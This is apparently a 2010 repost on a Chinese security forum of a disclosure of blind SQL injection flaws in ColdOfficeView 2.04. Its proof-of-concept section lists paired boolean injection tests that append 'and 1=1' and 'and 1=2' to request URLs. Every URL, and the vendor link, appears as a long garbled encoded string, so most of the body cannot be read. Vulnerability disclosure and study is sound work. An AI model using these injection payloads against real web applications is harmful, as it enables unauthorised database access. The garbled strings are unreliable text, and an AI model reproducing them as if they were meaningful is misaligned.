[转帖]ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖]ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities

发表于: 2010-9-9 10:47 2045

[转帖]ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities

freebsdlin 活跃值

2010-9-9 10:47

2045

# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities

# Vendor: e01K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4G2L8r3c8Y4k6h3&6Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

# Found by: mr_me (net-ninja.net)

PoC's

1. e67K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4c8S2M7X3N6W2N6q4)9#2c8q4)9J5c8W2)9#2b7Y4m8S2N6r3S2Q4y4f1c8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3y4X3L8g2)9K6c8X3k6#2M7$3g2S2j5%4c8A6L8$3&6Q4x3@1c8h3K9h3g2%4c8i4k6W2L8Y4c8p5k6i4c8S2K9h3I4K6i4K6t1$3c8i4k6W2L8Y4c8u0c8q4)9K6c8q4)9#2b7V1u0D9K9h3&6V1 SQLi]

1e3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4c8S2M7X3N6W2N6q4)9#2c8q4)9J5c8W2)9#2b7Y4m8S2N6r3S2Q4y4f1c8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3y4X3L8g2)9K6c8X3k6#2M7$3g2S2j5%4c8A6L8$3&6Q4x3@1c8h3K9h3g2%4c8i4k6W2L8Y4c8p5k6i4c8S2K9h3I4K6i4K6t1$3c8i4k6W2L8Y4c8u0c8q4)9K6c8o6p5`. and 1=1 << true

054K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4c8S2M7X3N6W2N6q4)9#2c8q4)9J5c8W2)9#2b7Y4m8S2N6r3S2Q4y4f1c8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3y4X3L8g2)9K6c8X3k6#2M7$3g2S2j5%4c8A6L8$3&6Q4x3@1c8h3K9h3g2%4c8i4k6W2L8Y4c8p5k6i4c8S2K9h3I4K6i4K6t1$3c8i4k6W2L8Y4c8u0c8q4)9K6c8o6p5`. and 1=2 << false

2. 234K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4c8S2M7X3N6W2N6q4)9#2c8q4)9J5c8W2)9#2b7Y4m8S2N6r3S2Q4y4f1c8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3y4X3L8g2)9K6c8X3k6#2M7$3g2S2j5%4c8A6L8$3&6Q4x3@1c8q4k6r3W2@1f1s2u0G2k6X3W2D9k6g2)9J5y4W2g2K6k6i4u0u0c8q4)9K6c8q4)9#2b7V1u0D9K9h3&6V1 SQLi]

281K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4c8S2M7X3N6W2N6q4)9#2c8q4)9J5c8W2)9#2b7Y4m8S2N6r3S2Q4y4f1c8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3y4X3L8g2)9K6c8X3k6#2M7$3g2S2j5%4c8A6L8$3&6Q4x3@1c8q4k6r3W2@1f1s2u0G2k6X3W2D9k6g2)9J5y4W2g2K6k6i4u0u0c8q4)9K6c8o6p5`. and 1=1 << true

8fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4c8S2M7X3N6W2N6q4)9#2c8q4)9J5c8W2)9#2b7Y4m8S2N6r3S2Q4y4f1c8Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3y4X3L8g2)9K6c8X3k6#2M7$3g2S2j5%4c8A6L8$3&6Q4x3@1c8q4k6r3W2@1f1s2u0G2k6X3W2D9k6g2)9J5y4W2g2K6k6i4u0u0c8q4)9K6c8o6p5`. and 1=2 << false

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・1

免费・0

支持